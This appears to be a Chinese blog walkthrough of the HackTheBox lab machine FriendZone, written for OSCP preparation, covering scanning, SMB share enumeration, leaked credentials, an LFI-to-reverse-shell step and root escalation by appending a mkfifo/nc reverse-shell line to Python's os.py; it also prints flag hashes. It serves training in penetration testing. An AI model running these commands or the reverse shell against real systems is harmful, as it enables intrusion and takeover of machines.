OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

Ethan医生5天前靶场22


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.62.153 (扫描UDP)

image.png

nmap -p139,445 -A -T5 --script=smb-enum-shares 10.129.62.153 

image.png

gobuster dir -u http://10.129.62.153/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png


http://10.129.62.153//robots.txt


image.png

 smbclient -L //10.129.62.153/ -N


image.png


 smbclient //10.129.62.153/Development -N(没有东西)

smbclient //10.129.62.153/general -N  (底下有creds.txt)

creds for the admin THING:


admin:WORKWORKHhallelujah@#

image.png


访问443

443页面提示证书错误,查看证书信息得到域名friendzone.red 、邮箱账号haha@friendzone.red

image.png

果然可以访问了

gobuster dir -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k


image.png

dig @10.129.62.153 axfr friendzone.red

image.png


image.pngimage.pngimage.png


image.pngimage.png

image.png

上面pagename 可以尝试访问PHP挡案后面填写dashboard则出现同样的图片

到smbclient上传

smbclient //10.129.62.153/Development

image.png

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/p_ec

反弹SHELL

image.png

image.png

5734bb92de589bbc6225e4f6f76e62b5

image.png

cat mysql_data.conf

for development process this is the mysql creds for user friend


db_user=friend


db_pass=Agpyu12!0.213$


db_name=FZ


尝试看看SSH

ssh friend@10.129.62.153 

image.png

发现有使用OS那们就可以使用这个进行修改



SUDO跟SUID没有啥特别查询到的-上传pysy64监听有没有脚本发现到下面

/bin/sh -c /opt/server_admin/reporter.py 

另一个则为:

/usr/bin/python /opt/server_admin/reporter.py 

image.png


发现有使用OS就可以去修改OS挡案进行提权

vi /usr/lib/python2.7/os.py

在最下方加入

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31  3334 >/tmp/f")

image.png

执行脚本的时后直接回反弹ROOT SHELL

image.png

47c6a8295e0ab676d1028cd2580646d6




































标签: OSCP

相关文章

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。